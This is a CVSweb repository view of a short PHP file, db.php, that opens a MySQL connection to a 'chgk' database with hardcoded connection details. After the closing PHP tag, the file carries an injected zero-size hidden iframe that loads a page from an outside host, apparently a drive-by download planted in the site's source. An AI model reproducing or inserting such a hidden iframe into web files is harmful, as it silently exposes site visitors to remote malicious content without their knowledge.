File:  [Local Repository] / db / prgsrc / new / Attic / db.php
Revision 1.2: download - view: text, annotated - select for diffs - revision graph
Fri Feb 8 22:49:12 2008 UTC (16 years, 4 months ago) by roma7
Branches: MAIN
CVS tags: HEAD
dbxml.php added

<?php

$hostname   = "localhost";
$database   = "chgk";
$username   = "piataev";
$password   = "";

$link = mysql_connect($hostname.':'.$port, $username, $password) or die("Can't connect to database");
mysql_select_db($database,$link) or die ("Can't select to database");
mysql_query ("SET NAMES 'koi8r'");


?><iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>